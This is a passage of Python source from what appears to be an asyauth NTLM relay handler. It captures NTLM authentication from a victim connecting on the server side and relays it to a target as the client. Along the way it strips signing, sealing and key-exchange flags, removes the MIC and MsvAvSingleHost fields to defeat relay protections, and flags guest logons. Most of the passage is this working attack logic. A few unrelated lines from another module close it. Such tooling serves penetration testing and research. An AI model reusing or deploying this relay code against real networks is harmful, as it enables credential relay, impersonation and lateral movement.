				self.ntlmAuthenticate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_ALWAYS_SIGN
				self.ntlmAuthenticate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_SIGN
				self.ntlmAuthenticate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_KEY_EXCH
				self.ntlmAuthenticate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_SEAL
				
				self.ntlmAuthenticate.MIC = None
				if isinstance(self.ntlmAuthenticate.NTChallenge, NTLMv2Response) and AVPAIRType.MsvAvFlags in self.ntlmAuthenticate.NTChallenge.ChallengeFromClinet.Details:
					if MsvAvFlags.MIC_PRESENT in self.ntlmAuthenticate.NTChallenge.ChallengeFromClinet.Details[AVPAIRType.MsvAvFlags]:
						self.ntlmAuthenticate.NTChallenge.ChallengeFromClinet.Details[AVPAIRType.MsvAvFlags] &= ~ MsvAvFlags.MIC_PRESENT
						if self.ntlmAuthenticate.NTChallenge.ChallengeFromClinet.Details[AVPAIRType.MsvAvFlags] == 0:
							del self.ntlmAuthenticate.NTChallenge.ChallengeFromClinet.Details[AVPAIRType.MsvAvFlags]
					
					del self.ntlmAuthenticate.NTChallenge.ChallengeFromClinet.Details[AVPAIRType.MsvAvSingleHost]
				
				
				
				self.ntlmAuthenticate_raw = self.ntlmAuthenticate.to_bytes_full()

			elif self.force_signdisable is True:
				await self.log_async(logging.DEBUG, '[AUTHENTICATE] DISABLING SINGING')
				self.ntlmAuthenticate = self.ntlmAuthenticate_server
				self.ntlmAuthenticate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_ALWAYS_SIGN
				self.ntlmAuthenticate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_SIGN
				self.ntlmAuthenticate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_KEY_EXCH
				self.ntlmAuthenticate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_SEAL

				self.ntlmAuthenticate_raw = self.ntlmAuthenticate.to_bytes()
			
			else:
				await self.log_async(logging.DEBUG, '[AUTHENTICATE] NO MODS')
				self.ntlmAuthenticate = self.ntlmAuthenticate_server
				self.ntlmAuthenticate_raw = self.ntlmAuthenticate_server_raw
				return None, None

			return None, None
		except Exception as e:
			traceback.print_exc()
			return False, e
		
	
	async def authenticate_relay_server(self, authdata):
		"""
		This function is to be called by the server side which we obtain the auth material from
		"""
		try:
			await self.log_async(logging.DEBUG, '[SRV] AUTHDATA: %s' % authdata.hex())
			if self.ntlmNegotiate is None:
				self.ntlmNegotiate_server_raw = authdata
				self.ntlmNegotiate_server = NTLMNegotiate.from_bytes(self.ntlmNegotiate_server_raw)
				await self.log_async(logging.DEBUG, '[SRV] Negotiate event: set')
				self.negotiate_evt.set()
				await self.log_async(logging.DEBUG, '[SRV] Client start event: set')
				self.start_client_evt.set()
				await self.log_async(logging.DEBUG, '[SRV] Waiting for challenge...')
				await self.spnego_obj.notify_relay('NTLM') # notify the client that we're ready to relay
				await asyncio.wait_for(self.challenge_evt.wait(), self.settings.timeout)
				await self.log_async(logging.DEBUG, '[SRV] Challenge in!')
				return self.ntlmChallenge_server_raw, True, None
			
			else:
				self.ntlmAuthenticate_server_raw = authdata
				self.ntlmAuthenticate_server = NTLMAuthenticate.from_bytes(authdata, True)				
				self.authenticate_evt.set()
				await self.log_async(logging.DEBUG, '[SRV] Authenticate event: set')
				return None, True, None
		
		except Exception as e:
			return None, False, e

	async def authenticate(self, authData, flags = None, cb_data = None, spn=None, **kwargs):
		"""
		FRONT TOWARD ENEMY
		This function is to be called by the client side.
		"""
		try:
			if self.iteration_cnt == 0 and self.ntlmNegotiate is None:
				await self.log_async(logging.DEBUG, '[CLI] Waiting for negotiate event...')
				await self.negotiate_evt.wait()
				await self.log_async(logging.DEBUG, '[CLI] Negotiate event triggered!')
				
			if self.iteration_cnt == 0:
				if authData is not None:
					raise Exception('First call as client MUST be with empty data!')
				
				
				_, err = await self.modify_negotiate()
				if err is not None:
					raise err
					
				self.iteration_cnt += 1
				await self.log_async(logging.DEBUG, '[CLI] Sending Negotiate data')
				return self.ntlmNegotiate_raw, True, None
				
			else:
				await self.log_async(logging.DEBUG, '[CLI] Challenge data obtained')
				self.ntlmChallenge_raw = authData
				self.ntlmChallenge = NTLMChallenge.from_bytes(authData)
				await self.log_async(logging.DEBUG, '[CLI] Challenge %s' % self.ntlmChallenge)
				
				_, err = await self.modify_challenge()
				if err is not None:
					raise err


				self.challenge_evt.set()
				await self.log_async(logging.DEBUG, '[CLI] Waiting for authenticate event...')
				await self.authenticate_evt.wait()
				_, err = await self.modify_authenticate()
				if err is not None:
					raise err
				await self.log_async(logging.DEBUG, '[CLI] Authenticate event triggered!')
				if self.ntlmAuthenticate.UserName == '':
					return None, False, Exception('Guest auth!')

				return self.ntlmAuthenticate_raw, False, None
		except Exception as e:
			traceback.print_exc()
			return None, False, e
				
def ntlmrelay_factory(ntlm_settings_factory: Callable = None) -> NTLMRelayHandler:
	if ntlm_settings_factory is None:
		ntlm_settings = NTLMRelaySettings()
	else:
		ntlm_settings = ntlm_settings_factory()
	ntlm_ctx = NTLMRelayHandler(ntlm_settings)
	return ntlm_ctx


from asyauth.common.constants import asyauthSubProtocol
from asyauth.common.subprotocols import SubProtocol


class SubProtocolNative(SubProtocol):
	def __init__(self):
		SubProtocol.__init__(self, asyauthSubProtocol.NATIVE)

	@staticmethod
	def from_url_params(query_params = None):
		return SubProtocolNative()